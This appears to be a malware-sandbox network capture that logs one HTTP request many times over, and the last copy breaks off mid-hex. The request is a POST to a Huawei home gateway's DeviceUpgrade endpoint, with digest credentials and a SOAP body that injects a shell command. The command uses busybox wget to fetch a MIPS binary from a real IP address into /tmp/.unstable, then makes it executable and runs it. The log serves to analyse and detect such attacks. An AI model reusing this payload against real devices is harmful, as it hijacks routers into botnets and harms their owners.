              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 